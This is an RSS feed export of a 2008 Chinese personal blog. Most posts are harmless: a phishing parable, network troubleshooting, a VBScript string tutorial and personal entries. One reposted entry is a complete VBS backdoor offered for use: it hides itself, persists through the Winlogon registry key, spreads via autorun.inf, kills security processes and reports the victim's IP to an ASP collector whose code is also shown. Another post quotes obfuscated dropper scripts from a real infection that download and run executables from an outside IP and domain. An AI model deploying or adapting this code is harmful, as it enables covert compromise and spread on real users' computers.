<![CDATA[小飞的blog]]> http://www.boofee.net/bigfee/index.php zh-cn http://www.boofee.net/bigfee/read.php?964 <![CDATA[吴敬链、许小年、华生]]> bigfee <bigfee@163.com> Tue, 02 Dec 2008 13:11:03 +0000 http://www.boofee.net/bigfee/read.php?964 http://www.boofee.net/bigfee/read.php?962 <![CDATA[[转]关于钓鱼式攻击]]> bigfee <bigfee@163.com> Wed, 26 Nov 2008 02:03:31 +0000 http://www.boofee.net/bigfee/read.php?962 monyer
有个例子,我也不记得以前说过没有。
钓鱼式攻击是什么东西呢?其实很简单:
某人Email给你:给我500块,预知你的未来,可以提前通知你,明天国王跟火箭队的比赛,火箭队会赢!
你当然不信啦,但是第二天的比赛,火箭队真的赢了,你说:巧合,巧合而已。
过了几天,他又email给你:给我500快,预知你的未来,可以提前通知你,明天湖人跟火箭队的比赛,湖人赢了。
你有点好奇,但你是绝对不会把钱给他的,但是第二天的比赛,湖人真赢了,你说:诶?难道是潜规则?
又过了几天,他又email给你:给我500快,预知你的未来,可以提前通知你,明天湖人跟七六人队的比赛,湖人赢了。
你开始猜,是不是真的啊?但第二天的比赛,湖人又赢了。
......
经过若干次循环后,你终于想要预知你的未来了。但是当你把钱汇出去没有得到答复时,你才知道上当了!
因为事情是这样的:
第一次发信8192封,一半说国王赢,一般说火箭赢;
第二次只给说火箭赢的4096人发信,分为2048人为湖人赢,2048为火箭赢;
第三次只给说湖人赢的2048人发信,分为1024人为湖人赢,1024为七六人赢;
......
很有可能他最终欺骗到的人只有10,但是这已经足够!
所以你可以说钓鱼式攻击一点技术含量都没有,不过可能你仍会因此被骗。
另外钓鱼者超多,请小心诱饵!


Tags - ]]> http://www.boofee.net/bigfee/read.php?961 <![CDATA[有线通上网显示受限制或无连接,但另一个电脑可以上]]> bigfee <bigfee@163.com> Sun, 23 Nov 2008 15:33:00 +0000 http://www.boofee.net/bigfee/read.php?961 状况如下:
他用的是有线通网络,他自己的笔记本可以正常上网,但把网线拔掉,换到另一台笔记本时,新接入的笔记本却无法上网,ip配置都是正确的,使用的是自动获取,但不知道为什么就是上不了.
听完他的叙述,我想了想,可能是有线通的计费系统把他的ip和mac地址绑定的缘故.所以我提出两个解决方法:
方法一、断掉有线通猫的电源,关闭电脑,过半小时以后再上。这样有可能解决
方法二、在能上网的电脑,打开运行——输入cmd,回车——在命令行提示中输入ipconfig /release ,释放ip。然后断掉电脑。把网线插入原先不能上的电脑的网卡上,同样打开运行——输入cmd,回车——在命令行提示中输入ipconfig /renew
根据我的推测,使用以上两个办法,因该是可以解决有线通上网显示受限制或无连接,但另一个电脑可以上的问题。
如果有朋友是有线通,正好碰到上面这个问题时帮我测试下,如果不行请留言告诉我,呵呵~
Tags - , , ]]> http://www.boofee.net/bigfee/read.php?959 <![CDATA[海贼王的评论]]> bigfee <bigfee@163.com> Mon, 17 Nov 2008 13:12:07 +0000 http://www.boofee.net/bigfee/read.php?959 Tags - ]]> http://www.boofee.net/bigfee/read.php?957 <![CDATA[转经典论坛(通过实例来实现split的理解)]]> bigfee <bigfee@163.com> Mon, 10 Nov 2008 08:53:40 +0000 http://www.boofee.net/bigfee/read.php?957
引用
作者:帅青蛙
最初发表于:经典论坛(通过实例来实现split的理解)
版权帅青蛙所有,如有引用,请注明相关信息。

大家有没有碰到过要想取一字符串里的某些值而无从下手?有没有觉得看书或教材对split的写法糊里糊涂……如果有此疑问的话,请看下面我对例子的解释,相信您会对这个有一定的了解。

例如我想取得一个ftp里的用户名及密码(服务器等)值(用IE当FTP时或从表中取出FTP的值)。
下面是我的解决思路:
设url为收到的URL值,这里指:url=ftp://username:password@server,请注意这句话的规律
我想大家都看清楚这个URL里的规律了吧,就是各个部分都被":"给区分成三个部分,即:ftp、//username、password@server
首先将这个URL的各个部分区分开来,用split(url, ":")
以下是具体的代码:

parts = split(url, ":") '此时parts就有三部分,parts(0)=ftp,parts(1)=//username,parts(2)=password@server'接下来剔除没有用到的信息'由于只取username,所以其中parts(0)跟parts(2)是无用的,直接不引用!newname=replace(parts(1), "//", "") '去除//符号,因为这不是username里的内容'此时的newname既为用户名。



以上是只取用户名的代码,如果你要再取密码的话,可以参考下面。

'由于用户名是属于parts(2)里的,而且包含服务器的信息,如果不取服务器,则:newpass = left(parts(2), instr(parts(2),"@")-1) '取值到@之前的位数。此时的newpass取为密码



以上代码为不取服务器地址的代码,如果有取服务器的话,其实也是很简单的

newparts=split(parts(2),"@") '此时newparts分成两部分:newparts(0)为密码,即password;newparts(1)则为服务器地址,即server'如果要输出密码的的话,直接response.write newparts(0)就可以了,服务器就newparts(1)

后话,对于要取一字符串中的某些字符或部分,只要抓住规律,再加上用split就可以很好做成各种效果。写此文,希望对大家的学习有所帮助,同时也希望大家能够指点一二!
责任编辑:H.R.M

Tags - , , ]]> http://www.boofee.net/bigfee/read.php?956 <![CDATA[师德?]]> bigfee <bigfee@163.com> Sun, 09 Nov 2008 06:35:43 +0000 http://www.boofee.net/bigfee/read.php?956

Tags - ]]> http://www.boofee.net/bigfee/read.php?955 <![CDATA[太累了,放开了,失去了,矛盾了]]> bigfee <bigfee@163.com> Sat, 08 Nov 2008 12:28:03 +0000 http://www.boofee.net/bigfee/read.php?955 我只是想说,不想让任何人受到伤害
我只是想说,我做的事情并不是我想做的
我只是想说,世事难料
我只是想说,太累了,放开了,失去了,矛盾了……
]]> http://www.boofee.net/bigfee/read.php?954 <![CDATA[cmd命令行下制作rar压缩包]]> bigfee <bigfee@163.com> Sat, 08 Nov 2008 12:10:51 +0000 http://www.boofee.net/bigfee/read.php?954 第一个c:\windows\test.rar是作为压缩以后生成的文件
后一个双引号里的意思是打包c盘下program files里面所有的文件
注意:program files后面没有"\"
Tags - , , ]]> http://www.boofee.net/bigfee/read.php?952 <![CDATA[转:vbs脚本后门一个]]> bigfee <bigfee@163.com> Tue, 04 Nov 2008 08:50:32 +0000 http://www.boofee.net/bigfee/read.php?952 本文在华夏黑客联盟首发,应版主要求加上首发链接:http://www.hxhack.com/bbs/...
非常批处理第二发布,转载请声明。

自己写的脚本后门,可以用来对付个人电脑,在xp下测试通过

如果把首行注释掉,运行时会提示“没有权限” ,这是由于后门运行时试图覆盖自身文件(系统属性)造成的,不影响运行。


On Error Resume Next'调试时注释掉本行
'--------------------------
'打开所在分区,避免分区打不开引起怀疑
Dim fso,wshshell,name_vbs,path_vbs,path_root
Set fso = Wscript.CreateObject ( "Scrip" & "ting.Fi" & "leSys" & "temObject" )
Set wshshell = WScript.CreateObject ( "WScript.Shell" )
path_vbs = WScript.ScriptFullName
name_vbs = fso.GetFileName ( path_vbs )
path_root = fso.GetDriveName ( path_vbs )
IF path_vbs = path_root & "\" & name_vbs Then
WshShell.SendKeys "%{F4}"
wshshell.Run path_root
End If
'--------------------------
'避免同时运行多个脚本
Dim tempfoldr,tempfile,tempfiles,ext,tempname
If (fso.FolderExists("c:\windows\temp\qq\")) Then
wscript.sleep 100
Else
fso.CreateFolder("c:\windows\temp\qq\")
End if
Set tempfoldr = fso.getfolder( "c:\windows\temp\qq\" )
set tempfiles = tempfoldr.files
For Each tempfile in tempfiles
If tempfile = "" Then
wscript.sleep 100
Else
ext = fso.GetExtensionName ( tempfile )
ext = CLng(ext)
tempname = fso.GetBaseName ( tempfile )
If timer - ext < 20 and tempname = Date Then
Wscript.Quit
End If
End If
Next
'--------------------------
'初始化变量,准备循环
Dim dev , devr , num , regpath , windowname , bag , pipe , attrib , name_window , xPost , url , name , pwd , request , ip , httppost
name_window = Array ( name_vbs , "autorun.inf" )
Set dev = fso.Drives
Set bag = GetObject ( "winmgmts:\\.\root\cimv2" )
attrib = "attrib +s +h "
regpath1 = "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"
regpath2 = "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
fso.CopyFile path_vbs , "c:\windows\" , True
wshshell.Run attrib & "c:\windows\" & name_vbs , 0
ip = GetIP
url = "http://localhost/qq.asp"
Set xPost = CreateObject("Microsoft.XMLHTTP")
httppost = true
num = 1
Do
'--------------------------
'隐藏自身,修改注册表
If num Mod 5 = 1 Then
wshshell.Run attrib&path_vbs , 0
WshShell.RegWrite regpath1 & "ShowSuperHidden" , "0", "REG_DWORD"
WshShell.RegWrite regpath1 & "Hidden" , "2" , "REG_DWORD"
WshShell.RegWrite regpath2 & "\Userinit" , "C:\windows\system32\userinit.exe,C:\windows\" & name_vbs & "," , "REG_SZ"
End If
'--------------------------
'遍历所有分区,并隐藏
If num Mod 20 = 1 Then
For Each devr In dev
If devr.DriveType = 3 or devr.DriveType = 2 or devr.DriveType = 1 Then
If devr <> "A:" Then
fso.CopyFile name_vbs , devr & "\" , True
CreateAutoFile name_vbs , devr
wshshell.run attrib & devr & "\" & name_vbs , 0
wshshell.Run attrib & devr & "\" & "autorun.inf" , 0
End If
End If
Next
End If
'--------------------------
'关闭标题含name_window的窗口,可考虑加一些其它的,再加上进程监视
For Each windowname In name_window
If WshShell.AppActivate ( windowname ) = True Then
WshShell.SendKeys "%{F4}"
End if
Next
Set pipe = bag.Execquery ( "select * from win32_process where name = 'ujurd.exe' or name = 'qdtyd.exe'")
For Each process In pipe
process.terminate()
Next
'--------------------------
'asp 发信
If httppost = true Then
xPost.Open "Post",url,false
xPost.setrequestheader "Content-Type","application/x-www-form-urlencoded"
xPost.send "ip=" & ip
If xPost.responsetext = "OK" Then
httppost = false
End If
End If
'--------------------------
'这里可以添加你自己的代码
'比如下载木马运行等
'--------------------------
'更新运行标志
If num Mod 7 = 1 Then
fso.DeleteFile "c:\windows\temp\qq\*"
fso.CreateTextFile ( "c:\windows\temp\qq\" & Date & "." &CLng ( timer ) )
End If
'--------------------------
'睡一会儿,并把计数器加一
wscript.sleep 1000
num = num + 1
Loop
'--------------------------
'创建autorun.inf
Function CreateAutoFile ( name_vbs , path )
On Error Resume Next
Set fso = Wscript.CreateObject ( "Scrip" & "ting.Fi" & "leSys" & "temObject" )
Dim autotext,auto_file
autotext = "[AutoRun]" & vbCrLf & "open=" & vbCrLf & "shell\open=打开(&O)" & vbCrLf & "shell\open\Command=Wscript.exe " & name_vbs & vbCrLf & "shell\open\Default=1" & vbCrLf & "shell\explore=资源管理器(&X)" & vbCrLf & "shell\explore\Command=Wscript.exe " & name_vbs
Set auto_file = fso.OpenTextFile ( path & "\autorun.inf" , 2 , true )
auto_file.Write ( autotext )
auto_file.Close
End Function
'---------------------------
'自变形引擎[运行出错……晕……请自己改吧]
Function AutoDeformation ( )
Set fso = CreateObject( "Scrip" & "ting.Fi" & "leSys" & "temObject" )
vCll = fso.OpenTextFile(WScript.ScriptFullName,1).Readall
fSds=Array("AutoDeformation","fso","fSds","tttt","vCll","auto_file","pipe","wshshell","name_vbs","path_vbs","path_root","tempfoldr","tempfile","tempfiles","ext","tempname","dev","num","regpath","windowname","bag","attrib","name_window")
For Each tttt In fSds
vCll = Replace(vCll,tttt, Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)))
Next
fso.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vCll
End Function
'---------------------------
'获取本机IP
'return 本机的IP地址
Function GetIP
Dim objWMIService,colItems,objItem,objAddress
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True")
For Each objItem in colItems
For Each objAddress in objItem.IPAddress
If objAddress <> "" then
GetIP = objAddress
Exit Function
End If
Next
Next
End Function
'----------------------------

下面是asp收信文件

<%
strLogFile="qq2008jh.txt"

ip = request("ip")

if ip ="" then
response.write "Sorry! 您没有权限查看该页!"
response.end
End If
StrLogText=StrLogText & "IP: " & ip & " (" & request.servervariables("REMOTE_HOST") & ") -- " & date & " " & time

set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing

response.write "OK"
%>

Tags - , , , ]]> http://www.boofee.net/bigfee/read.php?951 <![CDATA[病毒实例]]> bigfee <bigfee@163.com> Tue, 04 Nov 2008 07:44:03 +0000 http://www.boofee.net/bigfee/read.php?951 360总是查出有木马系统时间经常就变成2001年7月份了,c:\windows\helps\目录下还有bai.bat,help.dll,bai.vbs病毒文件,始终无法删除,会再生。

bai.bat文件内容如下:

del sss0.exe

ftp.exe -s:C:\WINDOWS\help\help.dll

if not exist sss0.exe sfd -s:C:\WINDOWS\help\help.dll

if not exist sss0.exe sft -s:C:\WINDOWS\help\help.dll

sss0.exe

sss0.exe

sss01.exe

sss01.exe

if not exist sss0.exe C:\WINDOWS\help\bai.VBS

:end

del C:\WINDOWS\help\help.dll

del C:\WINDOWS\help\bai.BAT

exit

============

bai.vbs文件内容如下:

on error resume next

set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))

Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))

xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+"ps.gogo52o.com/rc/zj/gx"+Chr(46)+Chr(106)+Chr(112)+Chr(103),Chr(48)

xPost.Send()

Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))

sGet.Mode = Chr(51)

sGet.Type = Chr(49)

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)

oshell.RUN "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),vbhide

oshell.RUN "cmd.exe /c del C:\WINDOWS\help\bai.VBS",vbhide

=====================

help.dll内容如下:

OPEN 59.34.197.188

and3

get crr.ini sss0.exe

get crt.ini sss01.exe

bye

================

好像是自动在59.34.197.188下载木马病毒,不知道怎么删除!目前最新的360均无法清楚,病毒会不定期再生!

我也是这样的情况

而且,系统时间经常就变成2001年7月份了,c:\windows\helps\目录下还有bai.bat,help.dll,bai.vbs病毒文件,始终无法删除,会再生。

bai.bat文件内容如下:

del sss0.exe

ftp.exe -s:C:\WINDOWS\help\help.dll

if not exist sss0.exe sfd -s:C:\WINDOWS\help\help.dll

if not exist sss0.exe sft -s:C:\WINDOWS\help\help.dll

sss0.exe

sss0.exe

sss01.exe

sss01.exe

if not exist sss0.exe C:\WINDOWS\help\bai.VBS

:end

del C:\WINDOWS\help\help.dll

del C:\WINDOWS\help\bai.BAT

exit

============

bai.vbs文件内容如下:

on error resume next

set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))

Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))

xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+"ps.gogo52o.com/rc/zj/gx"+Chr(46)+Chr(106)+Chr(112)+Chr(103),Chr(48)

xPost.Send()

Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))

sGet.Mode = Chr(51)

sGet.Type = Chr(49)

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)

oshell.RUN "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),vbhide

oshell.RUN "cmd.exe /c del C:\WINDOWS\help\bai.VBS",vbhide

=====================

help.dll内容如下:

OPEN 59.34.197.188

and3

get crr.ini sss0.exe

get crt.ini sss01.exe

bye

================

好像是自动在59.34.197.188下载木马病毒,不知道怎么删除!目前最新的360均无法清楚,病毒会不定期再生!

Tags - , ]]>